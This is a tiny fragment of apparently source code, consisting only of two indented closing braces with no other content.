    }
}